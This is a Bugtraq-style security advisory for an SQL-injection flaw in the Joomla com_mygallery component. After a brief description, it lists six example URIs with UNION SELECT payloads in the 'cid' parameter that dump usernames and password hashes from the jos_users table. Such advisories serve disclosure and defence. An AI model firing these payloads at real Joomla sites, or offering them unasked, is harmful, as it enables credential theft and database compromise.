28 lines
No EOL
1.7 KiB
Text
28 lines
No EOL
1.7 KiB
Text
Bugtraq ID: 37121
|
|
Class: Input Validation Error
|
|
Published: Feb 21 2008 12:00AM
|
|
Updated: Nov 24 2009 10:15PM
|
|
Credit: S@BUN
|
|
Vulnerable: Joomla com_mygallery 0
|
|
|
|
The 'com_mygallery' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
|
|
|
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
|
|
|
|
Attackers can use a browser to exploit this issue.
|
|
|
|
The following example URIs are available:
|
|
|
|
http://server/index.php?option=com_mygallery&func=viewcategory&cid=-9999999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14/**/from/**/jos_users/*
|
|
|
|
http://server/index.php?option=com_mygallery&func=viewcategory&cid=-9999999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11/**/from/**/jos_users/*
|
|
|
|
http://server/index.php?option=com_mygallery&func=viewcategory&cid=-9999999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password),concat(username,0x3a,password),15/**/from/**/jos_users/*
|
|
|
|
http://server/index.php?option=com_mygallery&func=viewcategory&cid=-1%20union%20select%201,2,user(),4,5,6,7,8,9,10,11,12--
|
|
|
|
http://server/index.php?option=com_mygallery&func=viewcategory&cid=-1+union+all+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15+from+jos_users
|
|
|
|
http://server/index.php?option=com_mygallery&func=viewcategory&cid=-1+union+all+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users |